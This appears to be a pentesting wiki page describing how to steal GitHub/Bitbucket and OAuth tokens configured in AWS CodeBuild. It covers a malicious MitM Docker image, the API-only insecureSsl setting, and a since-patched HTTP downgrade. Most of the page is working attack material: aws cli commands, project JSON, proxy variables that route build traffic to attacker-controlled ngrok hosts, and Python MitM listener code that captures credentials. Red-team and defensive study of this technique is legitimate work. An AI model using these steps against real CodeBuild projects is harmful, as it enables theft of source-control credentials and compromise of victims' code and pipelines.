AWS Codebuild - Token Leakage

Reading time: 6 minutes

Recover Github/Bitbucket Configured Tokens

First, check if there are any source credentials configured that you could leak:

aws codebuild list-source-credentials

Via Docker Image

If you find that authentication to for example Github is set in the account, you can exfiltrate that access (GH token or OAuth token) by making Codebuild to use an specific docker image to run the build of the project.

For this purpose you could create a new Codebuild project or change the environment of an existing one to set the Docker image.

The Docker image you could use is https://github.com/carlospolop/docker-mitm. This is a very basic Docker image that will set the env variables https_proxy, http_proxy and SSL_CERT_FILE. This will allow you to intercept most of the traffic of the host indicated in https_proxy and http_proxy and trusting the SSL CERT indicated in SSL_CERT_FILE.

1. Create & Upload your own Docker MitM image
   • Follow the instructions of the repo to set your proxy IP address and set your SSL cert and build the docker image.
     • DO NOT SET http_proxy to not intercept requests to the metadata endpoint.
   • You could use ngrok like ngrok tcp 4444 lo set the proxy to your host
   • Once you have the Docker image built, upload it to a public repo (Dockerhub, ECR...)
2. Set the environment
   • Create a new Codebuild project or modify the environment of an existing one.
   • Set the project to use the previously generated Docker image

3. Set the MitM proxy in your host

• As indicated in the Github repo you could use something like:

mitmproxy --listen-port 4444  --allow-hosts "github.com"

4. Run the build & capture the credentials

• You can see the token in the Authorization header:

  

This could also be done from the aws cli with something like

# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json

## With /tmp/buildspec.json
{
    "name": "my-demo-project",
    "source": {
        "type": "GITHUB",
        "location": "https://github.com/uname/repo",
        "buildspec": "buildspec.yml"
    },
    "artifacts": {
        "type": "NO_ARTIFACTS"
    },
    "environment": {
        "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
        "image": "docker.io/carlospolop/docker-mitm:v12",
        "computeType": "BUILD_GENERAL1_SMALL",
        "imagePullCredentialsType": "CODEBUILD"
    }
}

## Json

# Start the build
aws codebuild start-build --project-name my-project2

Via insecureSSL

Codebuild projects have a setting called insecureSsl that is hidden in the web you can only change it from the API.
Enabling this, allows to Codebuild to connect to the repository without checking the certificate offered by the platform.

• First you need to enumerate the current configuration with something like:

aws codebuild batch-get-projects --name <proj-name>

• Then, with the gathered info you can update the project setting insecureSsl to True. The following is an example of my updating a project, notice the insecureSsl=True at the end (this is the only thing you need to change from the gathered configuration).
  • Moreover, add also the env variables http_proxy and https_proxy pointing to your tcp ngrok like:

aws codebuild update-project --name <proj-name> \
    --source '{
        "type": "GITHUB",
        "location": "https://github.com/carlospolop/404checker",
        "gitCloneDepth": 1,
        "gitSubmodulesConfig": {
            "fetchSubmodules": false
        },
        "buildspec": "version: 0.2\n\nphases:\n  build:\n    commands:\n       - echo \"sad\"\n",
        "auth": {
            "type": "CODECONNECTIONS",
            "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
        },
        "reportBuildStatus": false,
        "insecureSsl": true
    }' \
    --environment '{
        "type": "LINUX_CONTAINER",
        "image": "aws/codebuild/standard:5.0",
        "computeType": "BUILD_GENERAL1_SMALL",
        "environmentVariables": [
            {
                "name": "http_proxy",
                "value": "http://2.tcp.eu.ngrok.io:15027"
            },
            {
                "name": "https_proxy",
                "value": "http://2.tcp.eu.ngrok.io:15027"
            }
        ]
    }'

• Then, run the basic example from https://github.com/synchronizing/mitm in the port pointed by the proxy variables (http_proxy and https_proxy)

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
    host="127.0.0.1",
    port=4444,
    protocols=[protocol.HTTP],
    middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
    certificate_authority = crypto.CertificateAuthority()
)
mitm.run()

• Finally, click on Build the project, the credentials will be sent in clear text (base64) to the mitm port:

Via HTTP protocol

[!TIP] > This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)

An attacker with elevated permissions in over a CodeBuild could leak the Github/Bitbucket token configured or if permissions was configured via OAuth, the temporary OAuth token used to access the code.

• An attacker could add the environment variables http_proxy and https_proxy to the CodeBuild project pointing to his machine (for example http://5.tcp.eu.ngrok.io:14972).

• Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: http://github.com/carlospolop-forks/TestActions
• Then, run the basic example from https://github.com/synchronizing/mitm in the port pointed by the proxy variables (http_proxy and https_proxy)

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
    host="0.0.0.0",
    port=4444,
    protocols=[protocol.HTTP],
    middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
    certificate_authority = crypto.CertificateAuthority()
)
mitm.run()

• Next, click on Build the project or start the build from command line:

aws codebuild start-build --project-name <proj-name>

• Finally, the credentials will be sent in clear text (base64) to the mitm port: